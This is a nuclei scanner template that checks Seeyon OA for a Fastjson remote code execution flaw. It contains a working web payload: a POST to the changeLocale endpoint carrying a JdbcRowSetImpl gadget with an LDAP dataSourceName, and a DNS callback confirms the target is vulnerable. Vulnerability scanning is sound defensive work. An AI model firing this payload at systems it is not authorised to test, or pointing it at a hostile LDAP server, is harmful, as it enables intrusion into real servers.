nuclei-templates/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml

29 lines
893 B
YAML
Executable File

id: seeyon-oa-fastjson-rce
info:
name: seeyon-oa fastjson rce
author: SleepingBag945
severity: critical
description: 致远OA Fastjson 远程代码执行
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
tags: seeyon,oa,rce,fastjson
http:
- raw:
- |
POST /seeyon/main.do?method=changeLocale HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_json_params={"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
# Enhanced by cs on 2022/07/05